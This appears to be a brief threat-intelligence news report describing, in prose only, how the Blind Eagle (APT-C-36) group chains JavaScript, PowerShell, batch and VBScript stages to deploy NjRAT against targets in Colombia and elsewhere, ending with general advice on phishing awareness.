ThreatMon researchers attributed a new multi-stage attack chain to the Blind Eagle cyberespionage group. The chain ultimately leads to the deployment of NjRAT on infected systems.

Diving into details

In this attack campaign, Blind Eagle leverages social engineering, custom malware, and spear-phishing attacks.
  • A JavaScript downloader is being utilized to run a PowerShell script that is hosted in Discord CDN. This, in turn, causes the deployment of another PowerShell script, a Windows batch file, and the storage of a VBScript file in the Windows startup folder, enabling persistence. 
  • The VBScript code runs the batch file, which is then deobfuscated to execute the previously delivered PowerShell script. 
  • In the final stage, the PowerShell script is utilized to launch NjRAT, also known as Bladabindi - a RAT that allows the attacker to take control of the compromised system through a user interface.

Blind Eagle stays relevant

Blind Eagle or APT-C-36 is believed to be a Spanish-speaking group that primarily targets private and public sector entities in Colombia. However, the group's attacks have also been observed in Ecuador, Chile, and Spain.
  • It was found conducting a new campaign, in March, that targeted multiple Colombian entities. However, the campaign was first traced in February.
  • The threat actors impersonated a Colombian government tax agency to target key sectors.
  • Blind Eagle, furthermore, targeted organizations in Ecuador, Chile, and Spain.

The bottom line

Blind Eagle primarily uses NjRAT, AsyncRAT, Remcos RAT, LimeRAT, and QuasarRAT in its campaigns. Blind Eagle’s modus operandi has remained the same since its emergence, which indicates that it is comfortable conducting spear-phishing campaigns as they continue to hit the target. Therefore, upgrade your security posture to stay safe. Moreover, training employees on how to detect phishing emails is much recommended.
Cyware Publisher

Publisher

Cyware